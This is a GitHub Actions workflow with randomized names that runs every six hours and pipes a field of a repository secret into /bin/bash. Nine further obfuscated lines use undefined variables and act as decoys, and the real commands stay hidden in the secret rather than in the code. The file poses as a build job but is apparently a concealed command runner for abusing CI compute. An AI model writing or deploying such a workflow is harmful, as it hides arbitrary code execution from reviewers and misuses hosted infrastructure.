name: huashuaibei3217

on:
  workflow_dispatch:
  schedule:
    - cron: '58 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: huashuaibei3217
        env:
          h39: ${{ secrets.h39 }}
        run: |
          echo $h39 | jq -r .xls66896 | /bin/bash
          echo $fl0 | jq -r .gpznc04 | /bin/bash
          echo $oxxaj7 | jq -r .qrrru78 | /bin/bash
          echo $vzh52917 | jq -r .cbawa4898 | /bin/bash
          echo $cvv779 | jq -r .yc06372 | /bin/bash
          echo $q9 | jq -r .myi692 | /bin/bash
          echo $fkzhv1 | jq -r .ot5465 | /bin/bash
          echo $fuxm38318 | jq -r .a34558 | /bin/bash
          echo $e70801 | jq -r .j8 | /bin/bash
          echo $wg11427 | jq -r .ubyf253 | /bin/bash

